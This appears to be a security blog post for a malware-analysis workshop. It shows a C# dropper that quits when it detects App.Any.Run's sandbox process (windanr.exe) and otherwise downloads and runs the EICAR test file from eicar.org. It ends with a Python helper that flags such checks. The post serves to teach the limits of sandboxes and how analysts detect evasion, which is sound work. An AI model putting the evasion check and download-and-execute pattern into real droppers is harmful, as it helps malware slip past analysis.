The goal of this research was to create a small dropper that could evade detection in the popular App.Any.Run sandbox solution, yet still determine if it was running in the sandbox or not. It is not 100% certain that this technique also works on the searcher and hunter versions of App.Any.Run, but it has been confirmed to work on the free version.
This research was conducted as part of a workshop on malware analysis for one of my clients, with the aim of demonstrating how easily tools like App.Any.Run and other sandbox solutions can be tricked. It is important to note that while sandboxes can be useful for initial analysis, they should not be relied upon as a replacement for human analysts. Even with features like “heavy anti-evasion”, these tools may not be able to detect more advanced malware. As a result, those tools should only be used as a supplement to human analysts.
The following code is a small .NET dropper that downloads and launches the EICAR test file, extended with a check intended to evade App.Any.Run's sandbox. The technique also works with heavy anti-evasion enabled. It checks for the presence of a specific executable (qemu-ga.exe) that always runs in the current version of the sandbox. If that process is found, the dropper simply quits: killing the process would terminate the connection to the guest operating system and would also require administrative rights, whereas merely checking whether the process exists requires neither.
Detecting the attack is fairly simple. Most malware analysts would probably immediately check why the application quits right after start and patch the check out; however, more junior analysts might get tricked by this.
Update: The process qemu-ga.exe has been renamed to the static name q.exe. That name is too unspecific to act on directly, therefore I changed the source to check for windanr.exe, another static artifact of the App.Any.Run sandbox.
Old Sample URL: Initial Sample
New Sample URL: Updated Sample
```csharp
using System;

/// <summary>
/// This code was created for a workshop to show how easy it can be
/// to trick "next generation security" products.
/// It should demonstrate that even a thing called
/// "Heavy anti evasion" is not that heavy.
/// In no way would I say the targeted sandbox is a bad project -
/// I love it! But everyone needs to understand the limitations.
///
/// This is not a tool that provides any illegal information.
/// We do not promote hacking or software cracking.
/// All the information provided on these pages is for educational purposes only.
/// The authors of this tool are not responsible for any misuse of the information.
/// You shall not misuse the information to gain unauthorized access and/or write malicious programs.
/// This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
/// You may try all of these techniques on your own computer at your own risk.
/// Performing any hack attempts/tests without written permission from the owner of the computer system is illegal.
/// IN NO EVENT SHALL THE CREATORS, OWNER, OR CONTRIBUTORS BE LIABLE FOR
/// ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
/// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
/// GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
/// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
/// IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
/// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
/// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
/// </summary>
namespace Heavy_anti_evasion_bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            // Sandbox check: windanr.exe is a static artifact of the App.Any.Run
            // guest. Enumerating processes by name needs no elevated rights;
            // if the artifact is present, exit quietly without dropping anything.
            foreach (var process in System.Diagnostics.Process.GetProcessesByName("windanr"))
            {
                Environment.Exit(1);
            }

            // Sandbox check survived: download and launch the EICAR test file.
            string remoteUri = "http://www.eicar.org/download/eicar.com";
            string saveFileName = "eicar.com";
            System.Net.WebClient myWebClient = new System.Net.WebClient();
            myWebClient.DownloadFile(remoteUri, saveFileName);
            System.Diagnostics.Process.Start(saveFileName);
        }
    }
}
```
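The dropper above gives itself away statically: the process-enumeration call and the hard-coded artifact name both end up in the compiled assembly. The following triage helper is an added example (not the post's code) showing how an analyst can spot that pattern before trusting a "clean, exited immediately" sandbox verdict. It scans a sample for the artifact names the post mentions (qemu-ga, windanr) stored as UTF-16LE string literals, and for the `GetProcessesByName` member name stored as ASCII, and flags the combination. The `SAMPLE` blob is a constructed stand-in for a compiled binary, not a real PE/CLR layout.

```python
"""Triage helper: flag samples that pair process enumeration with a
hard-coded sandbox artifact name. Added example, not the post's code."""
import re

# Process names the post identifies as App.Any.Run artifacts. Matched without
# ".exe" because the dropper calls GetProcessesByName("windanr").
SANDBOX_ARTIFACTS = ("qemu-ga", "windanr")

# In a .NET assembly, C# string literals sit in the #US heap as UTF-16LE,
# while referenced member names such as GetProcessesByName sit in the
# #Strings heap as plain ASCII/UTF-8.
PROCESS_ENUM_APIS = ("GetProcessesByName",)

# Constructed stand-in for a compiled sample (not a real PE/CLR layout):
# an ASCII member name followed by two UTF-16LE string literals.
SAMPLE = (
    b"MZ" + b"\x90" * 16
    + b"GetProcessesByName\x00"
    + b"\x00"
    + "windanr".encode("utf-16-le") + b"\x00\x00"
    + "http://www.eicar.org/download/eicar.com".encode("utf-16-le") + b"\x00\x00"
)


def offsets_of(blob: bytes, needle: bytes) -> list[int]:
    """All offsets of needle in blob, case-insensitive for ASCII letters."""
    hay, pat = blob.lower(), needle.lower()
    out, start = [], hay.find(pat)
    while start != -1:
        out.append(start)
        start = hay.find(pat, start + 1)
    return out


def extract_utf16_strings(blob: bytes, min_len: int = 6) -> list[str]:
    """Runs of printable UTF-16LE characters, like `strings -el`."""
    pat = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pat, blob)]


def triage(blob: bytes) -> dict:
    """Report sandbox artifact names and process-enumeration APIs found."""
    artifacts = {
        name: offsets_of(blob, name.encode("utf-16-le")) for name in SANDBOX_ARTIFACTS
    }
    apis = {api: offsets_of(blob, api.encode("ascii")) for api in PROCESS_ENUM_APIS}
    found_artifacts = sorted(n for n, offs in artifacts.items() if offs)
    found_apis = sorted(a for a, offs in apis.items() if offs)
    return {
        "artifacts": found_artifacts,
        "apis": found_apis,
        # Both together is the pattern worth a second look: the sample may be
        # exiting early because it recognised the sandbox, not because it is benign.
        "suspicious": bool(found_artifacts and found_apis),
    }


if __name__ == "__main__":
    print(triage(SAMPLE))
    for s in extract_utf16_strings(SAMPLE):
        print("  ", s)
```

Run it against a real sample by reading the file into `blob`; the string dump from `extract_utf16_strings` is usually enough to see the check, and `triage` only raises the flag when an artifact name and an enumeration API occur together, which keeps false positives from benign programs that merely list processes low.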